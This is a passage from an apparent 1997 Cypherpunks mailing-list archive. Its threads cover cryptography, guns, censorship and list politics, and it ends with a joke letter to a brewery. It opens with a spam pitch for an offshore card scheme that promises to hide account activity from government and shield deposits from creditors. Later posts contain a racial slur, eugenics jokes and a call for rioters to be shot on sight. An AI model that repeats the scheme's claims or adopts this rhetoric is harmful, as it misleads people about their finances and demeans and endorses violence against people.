Since these cards are not issued through the North American banking institutions and credit reporting systems, the existence and details of your account activity are not disclosed to government agencies or credit bureaus. ASSET PROTECTION: Your card deposits are virtually unreachable by creditors. PRESTIGE: Impress your friends and business clients with your card issued by an offshore bank of international reputation. Matrix participants agree to pay $300.00 per annum for services rendered by our club. This amount is charged to your credit card in 12 monthly installments of $25.00 each, and is then re-distributed among active Matrix Participants according to the above schedule. For an application & FAQ, email our autoresponder at: offshorecard1 at answerme.com P.S. - EXTRA OFFER - If you'd like information on obtaining 2 MORE Guaranteed Cards (same amount of credit & opportunity to earn money), please email application1 at answerme.com and we'll send off the applications to you ASAP! Thank you for your time. From tcmay at got.net Wed Aug 27 19:37:42 1997 From: tcmay at got.net (Tim May) Date: Thu, 28 Aug 1997 10:37:42 +0800 Subject: Socio-Economic Cults (Re: Cypherpunk Cults) In-Reply-To: <19970828011033.10773.qmail@hotmail.com> Message-ID: At 6:10 PM -0700 8/27/97, John Smith wrote: >William H. Geiger III: > >>In the Salem witch trial they were government trials (which were >based >on >>a political power struggle in Salem at the time) not lynch mobs. > >And how about our gun-crazy friend, who'd shoot anybody who messed >with him, his family, or his property. What do you think he's going >to do when that witch down the street puts a hex on his cow and it >dies? Sounds to me like we've got another shooting coming. Is that >the kind of world you want to live in? I don't shoot witches. Nor do I shoot Tree Huggers, Wiccans, Baalists, or even Jews. Unless they enter my property and I perceive them to be a threat to me. As a matter of fact, I was the "Judge" in the "First Internet Witch Trial." A well-known Wiccan/Pagan named Eric Raymond, familiar perhaps because of his "Hacker's Dictionary," was proselytizing for Paganism as the One True Internet and Extropian Religion on the Extropians list...something about pantheism and "The Goddess Inside" being anti-State and pro-Progress. I made fun of his views, so Eric issued a challenge: If I were to read several of the books and sites he recommended, and if I were still to conclude that Paganism/Wicca is "irrational," he would leave the Extropians list forever. This challenge was issued in March 1993. Personally, I wished him no ill will, but a challenge is a challenge. I accepted the challenge and spent entirely too much time reading his recommended sources, plus a bunch more. I read Adler's "Drawing Down the Moon." I read Isaac Bonewitz's "Real Magic." I read a bunch of Crowley, a bunch of stuff about Druids, OTO, and Viking mythology. And, for my own interest, a bunch of stuff on belief systems, evolutionary epistemology, etc....stuff by W.W. Bartley, Karl Popper, etc. After much consideration, I issued my "verdict" in June of 1993: Irrational as charged. And to his credit, Eric Raymond left the Extropians list. (So did I, 6 months later, for other, unrelated reasons.) But I would not shoot witches. What they do is of no concern to me. Frankly, what I learned from my researches fit my preconceived notions (having once had a girlfriend loosely associated with this nonsense), namely, that they tend not to try to recruit, and never force their views on others. The Most Evil Man in the World (TM) had as his mantra, "Do what thou wilt shall be the whole of the Law." Irrational to believe what they believe, but no threat to me. --Tim May There's something wrong when I'm a felon under an increasing number of laws. Only one response to the key grabbers is warranted: "Death to Tyrants!" ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1398269 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From 10 at dev.null Wed Aug 27 19:56:50 1997 From: 10 at dev.null (10th CypherPunk) Date: Thu, 28 Aug 1997 10:56:50 +0800 Subject: Stupid CypherPunks, Negative Reputation Capital & A Warm Place To Shit Message-ID: <3404E026.2E01@dev.null> Stupid CypherPunks, Negative Reputation Capital & A Warm Place To Shit (Was: Re: Sweden's Social Democrats Sterilize the Inferior / Was: DoJ press release on Bernstein case / Was: lack of evolutionary pressures / Was: Save the Children! / Was: Internet Content Coal. bars press from "news rating" mtg on 8/28 / Was: Welcome to Cypherpunks!) Declan McCullagh wrote: > >From: David Boaz > >Subject: Social Democrats Sterilize the Inferior > > > >Surprisingly, the revelations about 40 years of forced sterilizations by the > >Social Democratic governments in Sweden generated only small stories in the > >New York Times and the Washington Post. I forwarded a list of stupid CypherPunks to Swedish authorities today, asking them to see that the list was brought to the attention of whoever is currently in charge of resurrecting the concept of Eugenics. {Which has never actually left us, but has only been transmutated into a kindler, gentler, type of sterilization and euthenasia}. I was prompted to do so, not only in order to personally profit from having recently invested quite a sum of money in betting that my stock on the Futures Reputation Capital Market would dive to a new low, but also by the realization that the Great Threat To Freedom and Privacy (TM) is not the "stupid sheeple" who blindly follow the False Shepherds of Freedom (and cry out to the Pontius Pirates of Privacy to crucify the Constitution), who are to be decried as the Great Threat to Liberty and Human Rights. Neither is it the Intellectual Elitists who have decided to take it upon themself to decide "which" of our freedoms should be compromised "for the greater good"; or to decide "what" is news and what is *not* news; or to decide "who" has genetic traits which are a credit to the human race, and who has genetic traits which are a *debit* to human evolution; or to decide "why" one form of expression on the cypherpunks list is an "obscene flame" and another is "acceptable criticism." { "They came for the flamers and I wasn't a flamer, so I didn't speak up. Then they came for those who 'replied' to the flamers, and I didn't 'reply' to the flamers, so I didn't speak up. Then they came for the Last True CypherPunk, and even the lurkers remembered they were cyphperpunks, and they spoke up. - T.C.M in the year 1 BC/beyond censorship } No, the Great Threat To The CypherFreedom and CypherLiberty is CypherUs. (The 'u' in "us" is for 'you' and the 's' is for 'stupid') What *really* prompted this post was my seeing a short news blurb, at around 3 a.m. on the Swedish sterilization story above, and then not seeing it again despite flipping back and forth between all the major TV news programs, to get further details. What *really* prompted this post was spending over an hour on the InterNet, searching online news sources for details of the story, only to find a single, brief reference to it. (But finding tens of thousands of references to Nancy Lopez's progress in the Swedish Women's Golf Tournament taking place.) What *really* prompted this post was seeing the news on the Patel ruling in the Bernstein case, and knowing that it would be the focus of a great amount of press, and discussion, and analysis, and thought, and hyperbole, and...etc., etc, despite the fact that the government is laughing their butts off over a bunch of freedom-fighting dinosaurs dancing in the streets over their victory in tearing a small piece of concrete from a Wall that is being torn down slowly while plans are being finalized for replacing it with an ElectroMagnetic Curtain that can be built quickly under false pretexes while the netizen's are having their attention diverted with false issues which are nothing more than the decaying ruins of a previous civilization. Those who are doomed to believe (forged) history are bound to repeat it. > >By JIM (BELL-)HEINTZ (57) > >.c The Associated (Bench) Press > >Sweden had as many as 60,000 of its own citizens sterilized between > >1935 and 1976 (the year that Hitler finally died). > >Adults and children were singled out by doctors, school authorities > >or other officials and were pressured to consent to the procedures. > >(Keep in mind that these were Voluntary-Mandatory dehumanizations.) ... > >Though Sweden's sterilization program was a matter of record, it > >received little public attention, ignored in schoolbooks and hardly > >mentioned in reference works. > >(In other news, Nancy Lopez is kicking butt at the something-or-other > >golf tournament in Sweden, as 5,782,386.4 URL pointers show in Yahoo, > >Mountain Dew, and Alta Vista, the tangled web search engines.) > > A recent series by the prestigious newspaper Dagens Nyheter, > >however, has stirred national debate (but has managed to be covered > >up in most of the rest of the world by Nancy Lopez and Judge Patel). We all live within our own set of "parenthesis". We used to think of them as 'principles,' but then we found out that others, sometimes very good people, had a different set of parenthesis, which enclosed thoughts and attitudes and beliefs which were different from our own, and which might be just as valid from the perspective of their position in life. Then we found out that our own personal parenthesis were not a whole lot different from the walls being built by governements to keep people apart; to keep people being enemies of one another. How did we find out about parenthesis, and walls--their effect on our lives, how they separated us from the good people on the other side of them? We found this out via information and the technologies which brought it to our attention. Word-of-mouth and sailing ships, newspapers and the telegraph, the wireless and airplanes, television and jumbo jets. And finally, we found out about parenthesis and walls when we set sail on a new technology and discovered a new world, with a new language; a world and language where technology and communication were becoming one and the same. We discovered a world of Communication Technology in which the Medium *was* the Message, and the Message could be whatever we decided it would be, because We could *control* the Medium. _We_ could control the _Medium_. We could *control* the Medium. We (whatever we conceived ourself to be within the bounds of our own personal parenthesis), could exercise...Free Speech...we could CONTROL the Medium by which we Communicated. We could "talk" to someone in Weber-Weber Land, using words, and when words were no longer adequate (You know who you remind me of? ...uhh, there's this woman, a poet...uhhh), then we could "talk" to them with pictures (here's a GIF, from me to you, of what she looks like), and we could "talk" to them with *complete* information (and I am attaching the poem I quoted here, so that you can read it for yourself, and draw your own conclusions from your own context, and hers, as well as mine). We could _emphasize_ words, or we could SHOUT! Or we could emphasize words in a way that made more sense to *us*, even though we could still see understand the emphasis that _others_ were trying to commmunicate. And when others said, "There's no need to SHOUT!"... Well, WERE WE SHOUTING OR NOT? It was pretty obvious. The new method of communicating changed what was _obvious_ and what was not; it changed how we could lie and what we could lie about (I'm only twelve, AND I AM *NOT* SHOUTING!!!); it changed what we could pretend to ourselves, and what we couldn't (I am a computer expert, and I will prove it just as soon as I manage to kick these hacker kids off my system and access my resume); it changed the rules of engagement and the structure of power (My congressman sent me and 10,000 others an email saying he would be introducing legislation to criminalize spam. I sent him back anonymous email telling him that if he did so, I would kill him.); it changed what was possible and what was not, in our own minds and in our own communications, if not in our immediate reality (Where am I writing this from? From the compound in Waco! I can see the .jpegs of the flames rising in front of my face. I can hear the .wav screams of the children as they burn to death. I can merge them with the tape loop of the government negotiator doublespeaking, "David, don't do this to these people." as the *governement* was doing it to them.) Most importantly of all, the new method of communication changed our control over the information we received. It changed the level of *access* we had to information. It *empowered* us to *seek* the information we wanted, in order to build our own personal belief systems and direct the encompassing scope of our perceptions. It empowered us to search for the word "Nazi" in our New World according to _our_own_ Order (using AND, OR, NOT, +, -, etc.) It allowed us to read about the Holocaust ~and~ Revisionism. It allowed us to read about the Death of Hitler ~and~ the Escape of the Nazi's to the South Pole. It allowed us to read about the liberation of the Death Camps ~and~ the Escape of Eugenics into the bowels of Planned Parenthood. It allowed us to read all of the things which were an accepted part of our normal reality ~and~ those things which ran totally contrary to our accepted reality ~-~AND~-~ everything in between, in a variety of combinations, according to OUR search/wishes/beliefs/perceptions. The new technology allowed us to "seek out" new communities where the netizens who passed through could share our sameness or learn from our differences. We could move from community to community, and yet always remain our own, separate, Community of One. To: Major Domo @ Dumbo_Homo_Rambo_MauMau . NET subscribe community at other.org end (<---a command. *my* command. *my choice. *my decision) We could join, we could unjoin. We could "subscribe," not to a belief system, but to a community with an individual mix of belief systems which were similar/disimilar to our own. If we had nothing to learn, and nothing to teach, we could "unsubscribe." We didn't have to be consistent. We could subscribe to the Holocaust Remembrance mailing list, the Holocaust Denial mailing list, ~and~ to the Holocaust Revival mailing list and Holocaust Prevention mailing list. {Or, if we had the extreme good fortune to be handsome, beautiful, witty and intelligent, as well as between the ages of <=zero and >=infinity, we could subscribe to the cypherpunks mailing list, get our ultrasecret magic decoder ring, an invisible Toad tattored on our over-imaginative forearm, and support the Remembrance/Denial/Revival/Prevention of the Holocaust, the Hallowed Cause, the Halloween Costume and, last but not least--Howard Cossell.} In short, the New World Communication Union allowed us not only the Freedom of Speech, but also the "Freedom of Communication." "FREEDOM OF COMMUNICATION!!!" Freedom to . Freedom to SHOUT! FREEDOM TO SHOUT REALLY, REALLY LOUDLY!!!!! FREEDOM TO SHOUT F#!U$!C%!K^!(!I)!N-!G OBSCENELY! (Freedom to object to the previous freedom being abused.) The New World Communication Constitution was a "we the people" to whom "Anything not standardized, is permitted." Freedom to Subscribe, Freedom to Unsubscribe Freedom to 'scribive', freedom to "Take me off this damn list NOW!" (freedom to do the above 200 times and wonder why it wasn't working) Freedom to write your own majordomo code so that it supports all of the standardized majordomo commands, plus adding support for those with agraphia to 'srivibe', 'scrumbive', and 'scumdive'. Freedom to remain on the mailing lists where good-natured humorists made light fun of disabilities such as agraphia, and to leave the mailing lists where jackbooted, intolerant rednecks make fun of *serious* disabilities, such as Tourette FUCK!COCKSUCKER! Syndrome. Freedom to start a private mailing list where you can control the issues discussed, the way they are discussed, and to ask people to refrain from certain discussions on the list because they are off-topic, or BECAUSE I SAY SO, AND I'M THE MODERATOR! Freedom to start a public mailing list aimed at supporting crypto- anarchy, and leave it up to those who choose to join as to how best to address, discuss, contend, manipulate, piss, threaten, shout, insult, debate, and personally decide both what issues are relevant to the list and which issues are irreverent to the list, ~and~ which 'issues' may be leaving those nasty stains in your shorts/panties/(both). Freedom to divide your time between mailing lists where you know exactly what to expect because the list deals with specific issues and the list members stay on-topic, and mailing lists where mad hatters/dogs&englishment/scientists ramble on endlessly about a variety of issues, non-issues, re-issues, forgotten issues, and the like, often losing track of what the hell it was they were even talking about, if they were talking about anything at all. Which reminds me... The point that I may be trying to make, might have something to do with the fact that, in attempting to find further details about a 10-second sound-byte/news-blurb which had piqued my interest, I was suddenly struck by the realization that the difference between sheeple and people might be defined as whether they are passively processing input supplied by the Great Machine, or whether they are actively seeking and organizing their own information/input. Passive Information is not Knowledge. Passive Perception is not Attention. Passive Acceptance is not Decision. Passive acceptance of perceived information is not Wisdom. Robots are not human. Sheeple are not people. Humans are not robots. People are not sheeple. In attempting to seek out further details about the news blurb which concerned tens of thousands of my fellow humans being declared by others *not* to be human--to *not* have the right to pass their genes on to a succeeding generation--I realized that the mainstream media had no interest in "providing" me with those details. I realized that it *was* very important for the mainstream media to provide me with the details of how well Nancy Lopez was managing to get the small, round sphere to drop into a hole officially designated as a "cup." When I found a single, short (English) newstory on the sterilization of a mountain of my fellow humans, and a pointer to a Swedish magazine series on the issue/evert, which I couldn't read, I realized that my knowledge of further details would come from a combination of my own efforts and those of other netizens whose brains and domains and interests encompassed English, Swedish, the InterNet, and Humanity. My mundane mind recognized that life and human nature are such that others interests lie mainly in providing *their* information, which is of interest to *them*, and that it is up to *me* to position myself to encounter and/or seek that portion of the available information that I need to satisfy my own personal interests. My paranoid mind noted that I had seen the original news blurb only once, after which this newsworthy event mysteriously disappeared and had to thereafter be 'sought' by myself, and I realized that someone, somewhere, had made a decision as to what information would be made available to me througt *their* media. (After which I consulted, *my* media--the InterNet.) My depressed mind noted that I had managed to find only a single piece of usable information on the issue/event I had searched for on *my* media, and realized that the reason for this was a combination of censorship, tragedy of the commons, comfort, and stupidity. of censorship, tragedy of the commons, comfort, convenience, laziness and stupidity. Comfort - I like to sit on my fat ass and watch TV. Convenience - It is easy to just turn on the Tube and take whatever it is that the mainstream wants to provide for me. ("Watch me and I'll bleed you, cause you eat the shit I feed you." -Zappa) Tragedy of the Commons - 25,000,000 Lakers fans named Bubba would much rather hear about one putt than about 60,000 forced sterilizations. Laziness - I didn't post or make available to others the single piece of information I found. Why should I expect that others will automatically share the information they found? Censorship - The Great Battle taking place on the InterNet is the battle over *ACCESS* to information. Who will provide it? Who will be allowed to access it? What will be provided? What will access be denied to? The Great War on the InterNet is over *CONTROL* of information. Control of perception and attention. Control of virtual reality. Stupidity - I think I'm human. I think I'm people. I think I'm *me*. I think I'm a CypherPunk. I'm not human, I'm a robot who turns on the TV to get news about what is taking place in my world. I'm not people. I'm a sheeple who laughs along with the canned laugh-track on the sitcom. I'm a sheeple who taps his foot to the "Hollywood Strings Play the Rolling Stones" muzak in the supermarket. I'm a sheeple who waits for more news about my fellow humans being sterilized against their will, and then sit through three replays of Nancy Lopez's twenty foot putt, becoming comfortably numb, and forgetting about the problems of 'others'. I'm not a CypherPunk. I didn't take the information source I had found and share it with the list. I didn't write code--I didn't take this information and past information, and use my knowledge to create a post which others on the list could debug and add their own ideas to expand and diversify my creation. I'm the 'nigger' in the joke that got the presidential campaign press plane jokester fired. I just want loose shoes, tight pussy, and a warm place to shit. (The Politically Correct way to tell that joke is to replace 'nigger' with 'citizen'.) I'm a 'stupid' CypherPunk who hopes that someday the InterNet will match the high ideals of Television in providing me with all the information that is fit to byte. Well, the foregoing may not quite be true, just yet, but it *will* be after the Great Bandwidth Crisis--or the Great InterNet Terrorism Crisis--or the Great InterNet [Your Crisis Here] Crisis--when the government is "forced" to step in and "protect" us from ourself. I will settle for the 'official' internet news from the 'official' internet news sources, because I know I will not find further details on the Swedish Sterilization issue. There won't be enough 'Bandwidth' to provide the details. The details will be censored, in the interests of preventing 'Net Terrorism.' The [Your Crisis Here] problem will make it necessary to censor the details, make them top-secret, change them, deny them, reconstruct them. The foregoing *will* be true after the bumper-sticker which says, "TV is REAL!" is changed to "WebTV is REAL!" 10th CypherPunk From ravage at ssz.com Wed Aug 27 20:16:02 1997 From: ravage at ssz.com (Jim Choate) Date: Thu, 28 Aug 1997 11:16:02 +0800 Subject: PGP & IBM (Tadpole) POWERportable N40 & AIX? Message-ID: <199708280256.VAA10143@einstein.ssz.com> Hi, Does anyone know of any gotcha's with this machine, AIX, and PGP? Thanks! ____________________________________________________________________ | | | Participation requires more than just bitching! | | | | _____ The Armadillo Group | | ,::////;::-. Austin, Tx. USA | | /:'///// ``::>/|/ http:// www.ssz.com/ | | .', |||| `/( e\ | | -====~~mm-'`-```-mm --'- Jim Choate | | ravage at ssz.com | | 512-451-7087 | |____________________________________________________________________| From roach_s at alph.swosu.edu Wed Aug 27 20:42:32 1997 From: roach_s at alph.swosu.edu (Sean Roach) Date: Thu, 28 Aug 1997 11:42:32 +0800 Subject: heart Message-ID: <199708280337.XAA03583@www.video-collage.com> At 05:49 PM 8/27/97 -0700, Kent Crispinu wrote: > >On Wed, Aug 27, 1997 at 12:49:42PM -0400, Sean Roach wrote: >> At 11:55 PM 8/26/97 -0700, Kent Crispin wrote: >[...] >> >> Pretty soon every revolver will have a warning label. "Warning, misuse of >> this tool can result in injury and death. By handling this item you consent >> to bear all legal responsibility reguarding its use." Never mind that such >> should be implied. > >Product liability issues are more prominent when something doesn't >function as it is supposed to -- say you are trying to defend >yourself against a thief, and the gun blows up in your face. This is >not the same as assuming legal liability for when you shoot someone. > >Arguably, even then you should not be able to sue -- the small >aircraft industry has been decimated by product liability issues. >And I remember when Chouinard went out of the climbing equipment >business because of threat of lawsuits. > >My understanding is that warning labels -- even signed liability >releases -- are of limited use in these cases, because, while you can >sign a binding contract that limits your ability to sue, you cannot >so bind your survivors. I wasn't referring to when the things work improperly. I was referring to cases specifically like the lawsuit brought against the makers of the TEC-9 because some idiot used one on an office building full of people and it had the odassity to work. From roach_s at alph.swosu.edu Wed Aug 27 20:43:12 1997 From: roach_s at alph.swosu.edu (Sean Roach) Date: Thu, 28 Aug 1997 11:43:12 +0800 Subject: Socio-Economic Cults (Re: Cypherpunk Cults) Message-ID: <199708280337.XAA03584@www.video-collage.com> At 06:10 PM 8/27/97 PDT, John Smith wrote: > >William H. Geiger III: > >>In the Salem witch trial they were government trials (which were >based >on >>a political power struggle in Salem at the time) not lynch mobs. > >And how about our gun-crazy friend, who'd shoot anybody who messed >with him, his family, or his property. What do you think he's going >to do when that witch down the street puts a hex on his cow and it >dies? Sounds to me like we've got another shooting coming. Is that >the kind of world you want to live in? > >"John I like the little comment made in the first of MIB. And I paraphrase. Individuals are intelligent, people are stupid. That is the defining element of mass hysteria. The invidiual, if left alone would probably settle down, maybe even realize that he or she was wrong. The group with its anonymity in numbers, snowballs the emotions beyond the control of one person. I unfortunately chose bad examples. Better ones would be the LA Riots and the famous broadcast of War of the Worlds. From whgiii at amaranth.com Wed Aug 27 21:44:17 1997 From: whgiii at amaranth.com (William H. Geiger III) Date: Thu, 28 Aug 1997 12:44:17 +0800 Subject: Socio-Economic Cults (Re: Cypherpunk Cults) In-Reply-To: <199708280337.XAA03584@www.video-collage.com> Message-ID: <199708280445.XAA08389@mailhub.amaranth.com> -----BEGIN PGP SIGNED MESSAGE----- In <199708280337.XAA03584 at www.video-collage.com>, on 08/27/97 at 11:37 PM, Sean Roach said: >At 06:10 PM 8/27/97 PDT, John Smith wrote: >> >>William H. Geiger III: >> >>>In the Salem witch trial they were government trials (which were >based >>on >>>a political power struggle in Salem at the time) not lynch mobs. >> >>And how about our gun-crazy friend, who'd shoot anybody who messed >>with him, his family, or his property. What do you think he's going >>to do when that witch down the street puts a hex on his cow and it >>dies? Sounds to me like we've got another shooting coming. Is that >>the kind of world you want to live in? >> >>"John >I like the little comment made in the first of MIB. And I paraphrase. >Individuals are intelligent, people are stupid. >That is the defining element of mass hysteria. The invidiual, if left >alone would probably settle down, maybe even realize that he or she was >wrong. The group with its anonymity in numbers, snowballs the emotions >beyond the control of one person. I unfortunately chose bad examples. >Better ones would be the LA Riots and the famous broadcast of War of the >Worlds. While at first glance the LA riots may be an example in your favor but under closer inspection one can see that it is not. To show my point take a look at the stores that were looted and burned. While the unarmed store owners sat and watched their lifes work go up in smoke the ones who were armed and kept watch from their rooftops were able to save themselfs and their property. And where were are beloved Police? Hiding elseware eating thier donuts becuse they were too *chicken shit* to do thier job. It only goes to show that when the chips are really down you can not count on the government to save you. I don't know what happend in other towns durring the riots but where I was at we orginised a large group of arms citizens and made it well know that such actions would not be tolarated. And before anyone ask yes I think that every rat bastard involved in the riots should have been shot on sight. - -- - --------------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting Cooking With Warp 4.0 Author of E-Secure - PGP Front End for MR/2 Ice PGP & MR/2 the only way for secure e-mail. OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html - --------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: 2.6.3a Charset: cp850 Comment: Registered_User_E-Secure_v1.1b1_ES000000 iQCVAwUBNAT0PI9Co1n+aLhhAQEchgQAkAbJ3C5H3OtRtTbvefVa9KBHw4t/BsBe du1nNbZY4SpfNHXl5powCdPyEEgySgxrpgEM4huIIeJNaddxNbVVVmqjfkNxyDcL IUpiYBlfkSipUdMzc+r/Pkz/AlYaUGVQ5hhfQCS9R7ZYxPTGJvaMA58aRhBVGb6h dGElX2rGc24= =OrOv -----END PGP SIGNATURE----- From shamrock at netcom.com Wed Aug 27 22:15:36 1997 From: shamrock at netcom.com (Lucky Green) Date: Thu, 28 Aug 1997 13:15:36 +0800 Subject: heart In-Reply-To: <199708280337.XAA03583@www.video-collage.com> Message-ID: <3.0.2.32.19970827220917.006efda0@netcom10.netcom.com> At 11:37 PM 8/27/97 -0400, Sean Roach wrote: >I wasn't referring to when the things work improperly. I was referring to >cases specifically like the lawsuit brought against the makers of the TEC-9 >because some idiot used one on an office building full of people and it had >the odassity to work. Actually, it didn't work. The TEC-9 is such a lousy gun, it jammed immediately. The killer dispatched all his victim with his backup 45. Not that the pro-victimization lobby would care much about the facts. --Lucky Green PGP encrypted mail preferred. DES is dead! Please join in breaking RC5-56. http://rc5.distributed.net/ From dpj at world.std.com Wed Aug 27 22:24:19 1997 From: dpj at world.std.com (David Jablon) Date: Thu, 28 Aug 1997 13:24:19 +0800 Subject: Monkey Wrench into the works In-Reply-To: <199708271737.KAA26892@proxy3.ba.best.com> Message-ID: <3.0.1.16.19970828005458.3ae7e2f2@world.std.com> James, You're rebuttal to Myron's message is simplistically elegant, but just as wrong as the original posting. It is perfectly fine to secure a relationship using shared secrets ... in some situations. You are wrong in implying that shared secrets don't work anywhere. Myron is of course just as wrong in implying that his (or any) shared secret scheme will replace the many needs for a public-key infrastructure. (As the details on his scheme or intended applications aren't available, I have no further opinion on it.) "Myron Lewis" wrote: > We invite you and everyone on the list [...] to visit the KeyGen > webpage, www.KeyGen.com and learn about Automatic Synchronized > KeyGeneration(TM). If you think you recognize it as something you have seen > before, you're close but wrong. > > We are obviously biased, but we feel strongly and so do many others, that > ASK will solve many of the security problems presently under discussion. In > time, it will probably sink Key Management and Certificate Authorities. On 8/27/97, James A. Donald replied paraphrasing Ben Franklin, (who really knew very little about cryptography): >What one man knows, nobody knows. >What two men know, everyone knows. >Shared secrets just don't work. Clearly in many cases parties must share secrets. You and your bank keep mutual secrets about your money. You and your doctor keep mutually secret medical data. It's hardly a burden in many cases to keep a few more secret bits on a per-user basis, if it can help make things a lot more secure. For example, you might look at to see what just a few shared secret bits can really do. The EKE, SPEKE, and related methods leverage a lowly password as a strong factor in authentication. Public-keys and CA's are ideal and necessary for many things, like mutually anonymous short-lived relations. The "one-night-stand" web credit transaction comes to mind. For long-term relationships, the extra overhead of additional one-on-one key pre-agreement may often be insignificant, and I dare say that, in *some* cases, public-key encryption can be made almost irrelevant. The best methods of course usually combine these different paradigms as needed to achieve the most security and efficiency. ------------------------------------ David Jablon http://world.std.com/~dpj/ dpj at world.std.com From whgiii at amaranth.com Wed Aug 27 22:26:19 1997 From: whgiii at amaranth.com (William H. Geiger III) Date: Thu, 28 Aug 1997 13:26:19 +0800 Subject: heart In-Reply-To: <19970827174950.35762@bywater.songbird.com> Message-ID: <199708280528.AAA09045@mailhub.amaranth.com> -----BEGIN PGP SIGNED MESSAGE----- In <19970827174950.35762 at bywater.songbird.com>, on 08/27/97 at 05:49 PM, Kent Crispin said: >On Wed, Aug 27, 1997 at 12:49:42PM -0400, Sean Roach wrote: >> At 11:55 PM 8/26/97 -0700, Kent Crispin wrote: >[...] >> >> Pretty soon every revolver will have a warning label. "Warning, misuse of >> this tool can result in injury and death. By handling this item you consent >> to bear all legal responsibility reguarding its use." Never mind that such >> should be implied. >Product liability issues are more prominent when something doesn't >function as it is supposed to -- say you are trying to defend yourself >against a thief, and the gun blows up in your face. This is not the >same as assuming legal liability for when you shoot someone. >Arguably, even then you should not be able to sue -- the small aircraft >industry has been decimated by product liability issues. And I remember >when Chouinard went out of the climbing equipment business because of >threat of lawsuits. >My understanding is that warning labels -- even signed liability >releases -- are of limited use in these cases, because, while you can >sign a binding contract that limits your ability to sue, you cannot so >bind your survivors. I find that the majority of calls for tort reform here in the US is due to a lack of plain 'ol common sense in our judges and population in general. Lawsuits like the robber who sues the homeowner for breaking his leg, or the McD coffee case, or tens of thousands of other such cases would have been laughed out of court 50 yrs ago. - -- - --------------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting Cooking With Warp 4.0 Author of E-Secure - PGP Front End for MR/2 Ice PGP & MR/2 the only way for secure e-mail. OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html - --------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: 2.6.3a Charset: cp850 Comment: Registered_User_E-Secure_v1.1b1_ES000000 iQCVAwUBNAT+JI9Co1n+aLhhAQFHaAP/UrW872K8o6PWnPZJeR4TwsJMTYfksfxv P+h9neT9xbV4JNmhtm10jpsHxp2+iwCvfsE23tOmaeTXviIcYqfUgsTLOJ553Pwj Ty4R1BFK0wTPjxob5/eMGo0/0uM265/+6EW7xJ2zIFnpruAjMZxQI3vL3fHWgYm+ 2wQ7/MdPMRc= =m9eA -----END PGP SIGNATURE----- From nobody at REPLAY.COM Wed Aug 27 22:35:09 1997 From: nobody at REPLAY.COM (Anonymous) Date: Thu, 28 Aug 1997 13:35:09 +0800 Subject: Snuffle '97 Released / Re: Reuter on Bernstein Ruling Message-ID: <199708280526.HAA05384@basement.replay.com> Mike Duvos wrote: > > Patel also issued a permanent injunction barring the government > > from enforcing the regulations against plaintiff Daniel Bernstein or anyone > > who sought to use, discuss or publish his encryption program. > Now that Snuffle has been around for a while, it's obviously time for > an upgrade. Might I suggest "Snuffle '95" with the DES, 3DES, RC5, > and IDEA options. I just uploaded "Snuffle '97" to replay.com. The new version includes source code for PGP 5.0, a JPEG of Hillary Clinton in the nude, and the predicted date of death for the lawyer who files the government appeal in the Bernstein case. Saddam Hussein liked "Snuffle '97" so much, he bought the company! SnuffleMonger From frantz at netcom.com Wed Aug 27 23:14:59 1997 From: frantz at netcom.com (Bill Frantz) Date: Thu, 28 Aug 1997 14:14:59 +0800 Subject: Monkey Wrench into the works In-Reply-To: <199708271737.KAA26892@proxy3.ba.best.com> Message-ID: A quick glance at the web page shows that most of the features of their system could be achieved with a Blum Blum Shug (BBS) generator. However, some of the features seem to require that the BBS factors be known, and some seem to require that they be secret. ------------------------------------------------------------------------- Bill Frantz | The Internet was designed | Periwinkle -- Consulting (408)356-8506 | to protect the free world | 16345 Englewood Ave. frantz at netcom.com | from hostile governments. | Los Gatos, CA 95032, USA From kent at songbird.com Wed Aug 27 23:24:23 1997 From: kent at songbird.com (Kent Crispin) Date: Thu, 28 Aug 1997 14:24:23 +0800 Subject: Reduced choices in beer for cryptoanarchists Message-ID: <19970827230948.59862@bywater.songbird.com> -------Begin Forwarded Message---------------------------- The following is a letter sent to Miller Brewing. Miller's response is at the end. Miller Brewing Company Milwaukee, Wisconsin 53201 Dear Sir or Madam, I have been a drinker of Miller beer's for many years (actually, ever since that other company donated a big chunk of change to Handgun Control Inc. back in the mid 80's). Initially, my beer of choice was Lite, but some time in mid 1990 while in Honduras I switched to MGD smuggled up from Panama. Now, for nearly six years, I have been a faithful drinker of MGD. For these past years, I have come to expect certain things from Genuine Draft. I expect that whenever I see that gold can of MGD, I am about ready to enjoy a great, smooth brew. But wait! Sometime around the first of the year, my beloved MGD changed colors, so to speak. That familiar gold can was no longer gold! Knowing that I am, by nature, somewhat resistant to change, I forced myself to reserve judgment on the new can design. Gradually, I grew to appreciate the new label. That was until about May of this year. That was when I discovered (empirically) that I really didn't like the new design. Further investigation of the cause of my distress resulted in the following observations: 1. Your cans are made of aluminum. 2. Aluminum is a great conductor of energy. 3. Your beer is commonly consumed outside, and thus, the container may be exposed to sunlight. 4. Sunlight striking the can causes radiant warming of the surface of the can. 5. The resultant heat (energy) is transferred through the aluminum, by conduction, to the contents of the can (the beer). 6. Warm beer sucks. This is a process that can be observed in just about any beer. However, this process is significantly accelerated in MGD because you painted the damn can black!!! Who was the rocket scientist that designed the new graphic for the can and implemented the change right before summer? Granted, this process may not be real evident up there in Wisconsin, but down here in Oklahoma where the summers are both sunny and hot, this effect is quite a problem. There's no telling what the folks in Texas and Arizona are having to put up with. Knowing that you would probably not address this issue unless you had firm evidence of a problem, I and several other subjects conducted extensive experimentation. The results of these experiments are listed below. The experiments were conducted over two days on the deck next to my pool. The study included seven different types of beer (leftovers from a party the previous weekend) that were initially chilled to 38 deg. (and then left exposed to sunlight for different lengths of time. These beers were sampled by the test subjects at different intervals. The subjects, all normally MGD drinkers, were asked at each sampling interval their impressions of the different beers. The length of time between the initial exposure to the sunlight and point where the subject determined the sample undrinkable (the suckpoint) was determined. The average ambient temperature for the trials was 95 degrees F. Beer Type Average Suckpoint (min) Miller Lite (white can) 6.2 Bud (white can) 